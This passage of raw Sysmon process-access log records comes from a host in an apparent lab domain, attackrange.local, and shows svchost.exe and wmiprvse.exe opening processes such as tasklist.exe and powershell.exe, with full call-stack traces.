21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025932Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025927Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025926Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025925Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025924Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025923Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025922Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025921Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025920Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A273-60D3-3D05-00000000CF01}5832C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025919Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025918Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-A269-60D3-0B05-00000000CF01}4844C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025917Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025916Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000025915Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025914Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025913Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025912Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:30.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A346-60D3-6406-00000000CF01}388C:\Windows\system32\tasklist.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025911Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:30.723{4DB9351A-A346-60D3-6506-00000000CF01}65322504C:\Windows\system32\wbem\wmiprvse.exe{4DB9351A-9F32-60D3-D100-00000000CF01}100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798